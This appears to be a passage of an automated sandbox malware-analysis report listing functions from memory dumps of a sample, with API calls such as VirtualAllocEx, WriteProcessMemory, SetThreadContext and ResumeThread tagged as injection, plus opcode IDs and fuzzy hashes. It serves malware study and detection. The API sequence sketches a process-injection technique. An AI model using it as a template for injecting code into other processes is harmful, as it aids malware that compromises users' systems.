                                                                                        control_flow_graph 970 12f44b4-12f59d9 CreateActCtxA 973 12f59db-12f59e1 970->973 974 12f59e2-12f5a3c 970->974 973->974 981 12f5a3e-12f5a41 974->981 982 12f5a4b-12f5a4f 974->982 981->982 983 12f5a51-12f5a5d 982->983 984 12f5a60 982->984 983->984 986 12f5a61 984->986 986->986
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 012F59C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823772736.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12f0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: 68f4e0357a221c67638f2df69b882c0cf0ccd120933099f712f2f1fa83e0b7c2
                                                                                        • Instruction ID: ef883cef55cc300c19515038a0961bf0bb722235ab9f9cbb2badd53e12d14c5e
                                                                                        • Opcode Fuzzy Hash: 68f4e0357a221c67638f2df69b882c0cf0ccd120933099f712f2f1fa83e0b7c2
                                                                                        • Instruction Fuzzy Hash: 5F41E0B0C1071DCBDB28CFA9C984A8DFBF5BF49304F20806AD508AB251DBB56985CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0990DB40 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0990DBD8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: e97c1870b359f04e75957d372f66d62377a5d7de417cbe68ae639e1687e72099
                                                                                        • Instruction ID: 2012be3afb6e2374c5a0a5f97185d75c34c6f4191f6a9d060b71c6fd387e75f0
                                                                                        • Opcode Fuzzy Hash: e97c1870b359f04e75957d372f66d62377a5d7de417cbe68ae639e1687e72099
                                                                                        • Instruction Fuzzy Hash: CB2146B5900319CFDB10CFA9C981BEEBBF5FF88310F14842AE959A7290D7789554CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0990DB44 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0990DBD8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: e48fa2c5ff13509b69eb306a846521a11e4208b43ba41d2aa234ceee08e6d670
                                                                                        • Instruction ID: d26714aa2bec80c198fbe527dd23eadd7d6c785a845448fba749459071cba821
                                                                                        • Opcode Fuzzy Hash: e48fa2c5ff13509b69eb306a846521a11e4208b43ba41d2aa234ceee08e6d670
                                                                                        • Instruction Fuzzy Hash: 792146B59003098FDB10CFA9C981BDEBBF5FF48310F14842AE958A7290D7789544CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0990DB48 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0990DBD8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 96b66dd5dd800f1dbee3e81df99d90070371746daec452585b29d450017e2f48
                                                                                        • Instruction ID: fe22f9d0570e83b2732b33eab90de86847f4e0c6f15fbda42a56cbdfb0e2a263
                                                                                        • Opcode Fuzzy Hash: 96b66dd5dd800f1dbee3e81df99d90070371746daec452585b29d450017e2f48
                                                                                        • Instruction Fuzzy Hash: 8A2157B19003099FCB10DFA9C880BDEBBF5FF88310F148429E958A7290D778A944CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0990DC30 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0990DCB8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: b4109ca62d346e8f1b4cb3a5c99a5453eba537a7d93b1b0f017d3928f495785c
                                                                                        • Instruction ID: 5217b86039caa3be2c7cc69f07b94e2fd59d24b94e9c14ae37c91a16da5c5058
                                                                                        • Opcode Fuzzy Hash: b4109ca62d346e8f1b4cb3a5c99a5453eba537a7d93b1b0f017d3928f495785c
                                                                                        • Instruction Fuzzy Hash: DB2136B1C003199FCB10CFA9C9816EEBBF5FF48310F10842AE558A7290C7749545DBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0990D570 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0990D5F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: a3e3eca8365f65ec1a89a7159d29447e70429bed90d40f3816b42e381c10490f
                                                                                        • Instruction ID: 07d63561f50c5c69352e842cc8d119db5402af11050350b593878613b64c4579
                                                                                        • Opcode Fuzzy Hash: a3e3eca8365f65ec1a89a7159d29447e70429bed90d40f3816b42e381c10490f
                                                                                        • Instruction Fuzzy Hash: BC2168B1D003098FDB10DFAAC5857EEBBF4AF88314F14C42AD959A7281C7789984CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012FD6A9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012FD737
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823772736.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12f0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 790a0fea3a45a2f96abf104a3fbdbcf1d1423b2e5e7fdf7b370edac3771a5694
                                                                                        • Instruction ID: 91ce45ebae2c10aa91a8d7b52b87a277a42ec0d5e4a63eda3f8272bf36ca02da
                                                                                        • Opcode Fuzzy Hash: 790a0fea3a45a2f96abf104a3fbdbcf1d1423b2e5e7fdf7b370edac3771a5694
                                                                                        • Instruction Fuzzy Hash: C721F2B5900258DFDB10CFAAD584AEEFFF4EB48310F14802AE954A7210C374A941CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0990DC34 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0990DCB8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: 1679b4e90be821d46bec1f8eecf8ab33ed489caea32a9e7140a45b170e77b4ca
                                                                                        • Instruction ID: 42f7e8259b77a02d1a419bdbd450f20d0d868f6797cd4b2bfbf5a9f704915e80
                                                                                        • Opcode Fuzzy Hash: 1679b4e90be821d46bec1f8eecf8ab33ed489caea32a9e7140a45b170e77b4ca
                                                                                        • Instruction Fuzzy Hash: 5D2114B5C003599FCB10DFA9C985AEEBBF5FF48320F10842AE958A7250C7789545DBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0990DC38 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0990DCB8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: 45b307f75b19198d4027333cd4e4388f354908adf76831be64cb477fa7b20b89
                                                                                        • Instruction ID: 1992da9365736ba5426542af363b4c45869ba7214cafcd90fab3f9ad5c5ac17d
                                                                                        • Opcode Fuzzy Hash: 45b307f75b19198d4027333cd4e4388f354908adf76831be64cb477fa7b20b89
                                                                                        • Instruction Fuzzy Hash: C62139B1C003599FCB10DFAAC940ADEFBF5FF48320F108429E558A7250C7759544CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0990D578 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0990D5F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: d9afb420147259b662cfab898ca8ced99c41e67c1bff2c3cbc92609a4db0db86
                                                                                        • Instruction ID: f0c672dcc2451ffb0b912a0b52679bbc96fc4dc1c0225a2caa87c00f3c93ff2a
                                                                                        • Opcode Fuzzy Hash: d9afb420147259b662cfab898ca8ced99c41e67c1bff2c3cbc92609a4db0db86
                                                                                        • Instruction Fuzzy Hash: 0B2138B1D003098FDB10DFAAC4857EEBBF4EF89324F108429D559A7281CB789944CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012FD6B0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012FD737
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823772736.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12f0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 991a87275135c9f80204205fbc809b71dd88847a7f827cb4d08b1ce8d3439014
                                                                                        • Instruction ID: 1ef01464e64f982ad5b8306bb25668869b4e25d13a2cc85830e1efa15fd99450
                                                                                        • Opcode Fuzzy Hash: 991a87275135c9f80204205fbc809b71dd88847a7f827cb4d08b1ce8d3439014
                                                                                        • Instruction Fuzzy Hash: 5721E3B5900258DFDB10CF9AD584ADEFBF4EB48310F14841AE954A7250D374A940CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012FA150 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012FB099,00000800,00000000,00000000), ref: 012FB2AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823772736.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12f0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: ff234691f7308c3e1aaf86447acf37e039bfeca3db3a209b5f872ffd6d03aec8
                                                                                        • Instruction ID: 2aefed8eae8f6cbc26f78a85866dccacf3334af3bddb991265d10030fb9bee17
                                                                                        • Opcode Fuzzy Hash: ff234691f7308c3e1aaf86447acf37e039bfeca3db3a209b5f872ffd6d03aec8
                                                                                        • Instruction Fuzzy Hash: AA1126B6D103098FDB10CF9AC544ADEFBF4EB49320F10842ED619A7210C375A545CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012FB238 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012FB099,00000800,00000000,00000000), ref: 012FB2AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823772736.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12f0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 3a651a459885a3e051059395e41971adbb025f8dba34c82ffeee081f213fb670
                                                                                        • Instruction ID: a26666b6b7c732435c2c0105378650693b42279fb481d1ac7ffa31591912f9ee
                                                                                        • Opcode Fuzzy Hash: 3a651a459885a3e051059395e41971adbb025f8dba34c82ffeee081f213fb670
                                                                                        • Instruction Fuzzy Hash: CB1123B6C003099FDB10CFAAD844ADEFBF4EB89320F10842EDA19A7610C375A545CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0990DA81 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0990DAF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: e4cc3621ab2198ce01f3df166b5301f5e4200e2381a1468f9d3b08a3e50aa797
                                                                                        • Instruction ID: 1a538d63847632b287f2fac7fb0ae516be5fe13cc1fb82576d079300a2b0900f
                                                                                        • Opcode Fuzzy Hash: e4cc3621ab2198ce01f3df166b5301f5e4200e2381a1468f9d3b08a3e50aa797
                                                                                        • Instruction Fuzzy Hash: 761156B68002488FCB10DFA9C945BEEBFF5AF88320F148819E569A7290C7759544CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0990DA84 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0990DAF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: a702ddf7b655e53bbd41556b8e1826cdfa2298e6e1b02294083e8e27786ca444
                                                                                        • Instruction ID: 4e4b3d3d2ad237b29a4e2fd7ecdc0f8a6052804118dda9bcae71e8a0585c1108
                                                                                        • Opcode Fuzzy Hash: a702ddf7b655e53bbd41556b8e1826cdfa2298e6e1b02294083e8e27786ca444
                                                                                        • Instruction Fuzzy Hash: F51156B68002488FCB10DFA9C945BDEBFF5EF88320F14881AE559A7250C7759544CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0990DA88 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0990DAF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 1190e17f997da28602be256bc035f90d9583d11b177a1cc850ebe26fd3f18e94
                                                                                        • Instruction ID: 233f9cd674535fde957a092534046e7f5e42b165648a9840d07f224a39e5bcb7
                                                                                        • Opcode Fuzzy Hash: 1190e17f997da28602be256bc035f90d9583d11b177a1cc850ebe26fd3f18e94
                                                                                        • Instruction Fuzzy Hash: 011126B19002499FCB10DFAAC844ADEBFF5EB89320F148419E559A7250C775A554CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0990D4C0 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 9bdd4351d8d3f1f4a4146d34f53b46f94b7b65d5d1add8c9321f9321f07ac119
                                                                                        • Instruction ID: 9d36c034825a64b2f195a993e03ad084e357205ed6159db000024bcd9ee603c2
                                                                                        • Opcode Fuzzy Hash: 9bdd4351d8d3f1f4a4146d34f53b46f94b7b65d5d1add8c9321f9321f07ac119
                                                                                        • Instruction Fuzzy Hash: 641155B1D003088FDB20DFAAC5457EEFBF4AF89324F20882AC559A7290C734A585CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0990D4C4 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 477a49862780222ff3ca688c37403e973f43af00fbe0dba522ad19ab07e3980e
                                                                                        • Instruction ID: 75b66cc4816496eaff22e285bff03824a781dc1ed0c0656c5656af0f185c6fd9
                                                                                        • Opcode Fuzzy Hash: 477a49862780222ff3ca688c37403e973f43af00fbe0dba522ad19ab07e3980e
                                                                                        • Instruction Fuzzy Hash: 721158B1D003088FCB20DFA9C5457EEFBF4AF88324F20841AC559A7290C734A544CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0990D4C8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 7c121be2ce5f0f2e531d0c32aa526f99ec4ddc8de644264c3ff9af57fa24dd62
                                                                                        • Instruction ID: 2a591149b423a7f4f2f4cd5ee6acda5063d6f3eb5f9facda589ca3f69a80e2b6
                                                                                        • Opcode Fuzzy Hash: 7c121be2ce5f0f2e531d0c32aa526f99ec4ddc8de644264c3ff9af57fa24dd62
                                                                                        • Instruction Fuzzy Hash: 941125B1D003488FCB20DFAAC4457EEFBF4EB89324F208429D559A7290CB75A944CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012FAFB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 012FB01E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823772736.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12f0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: 0f306f528e51c81fdf08626b337ab534fb320875498e3075ece6ef065fcab699
                                                                                        • Instruction ID: aec4c2ab9fd6413048d989737c74a4df0db879c7fca5bafc91485fda65e52e1b
                                                                                        • Opcode Fuzzy Hash: 0f306f528e51c81fdf08626b337ab534fb320875498e3075ece6ef065fcab699
                                                                                        • Instruction Fuzzy Hash: C7110FB5C002498FDB10CF9AD444ADEFBF4AB88324F10842EDA28A7210D375A545CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 08FC18D1 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 08FC1935
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1840621428.0000000008FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_8fc0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: 5e5b5f12c1ee7047eac88a940889305217c28a256c5c49738a3e4bc5154593a5
                                                                                        • Instruction ID: f8f588c5dc1c6abf8d9e16968764ec43fb02d4afc1f9780d5dbe5edaa3321b7a
                                                                                        • Opcode Fuzzy Hash: 5e5b5f12c1ee7047eac88a940889305217c28a256c5c49738a3e4bc5154593a5
                                                                                        • Instruction Fuzzy Hash: 9111F2B5800249CFDB10DF9AC645BDEBBF4EB48320F20841AD558A7651C374A694CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 08FC18D8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 08FC1935
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1840621428.0000000008FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_8fc0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: 24619f76815b8fa1d194ba9b927581f2977a882157dd6f0befd02dc69e9427bb
                                                                                        • Instruction ID: c7080edc97f27ee2441b4400ea092e13562679cb005623be05a77df8d043add2
                                                                                        • Opcode Fuzzy Hash: 24619f76815b8fa1d194ba9b927581f2977a882157dd6f0befd02dc69e9427bb
                                                                                        • Instruction Fuzzy Hash: C21103B58003499FCB10DF9AC544BDEFBF8EB49320F108419E558A7610C375A694CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 08FC18D4 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 08FC1935
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1840621428.0000000008FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_8fc0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: 54cb36f052ffe3af2a3e987cb48ae1301144de5eaf57de67d4e8dfbc98ae88a9
                                                                                        • Instruction ID: 1c209b88dc797fca070a963e8471f0ec359efd341573b46152397819484e2a1a
                                                                                        • Opcode Fuzzy Hash: 54cb36f052ffe3af2a3e987cb48ae1301144de5eaf57de67d4e8dfbc98ae88a9
                                                                                        • Instruction Fuzzy Hash: 881103B5800249DFDB10CF99C545BDEBBF4EB48320F10841AD958A7650C374A694CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0129D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823395366.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_129d000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f4adc055aa793f013e028a4949069fe38e7fe9f7016667987c4e0298437e5822
                                                                                        • Instruction ID: f5168cefd319d54fd63455be3d79481f10298cae30e27d455c39c967e20775d4
                                                                                        • Opcode Fuzzy Hash: f4adc055aa793f013e028a4949069fe38e7fe9f7016667987c4e0298437e5822
                                                                                        • Instruction Fuzzy Hash: 45214575110208DFDF01DF4CC9C0B6ABF65FB88324F20C16DEA090B25AC33AE446DAA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012AD01C Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823527109.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12ad000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5dec96502a32a74f86f852fd373e6350494b27d9a8ee8dc5991a95211f495148
                                                                                        • Instruction ID: ffa64ab6cebec9c618dfeb10ee761fc0a0bf756fde56c6242040ee7c109ec5f7
                                                                                        • Opcode Fuzzy Hash: 5dec96502a32a74f86f852fd373e6350494b27d9a8ee8dc5991a95211f495148
                                                                                        • Instruction Fuzzy Hash: CC216470294208DFCB11DF68D9C0B26BFA1FB88314F60C56DD90A4B656C37BD407CA61
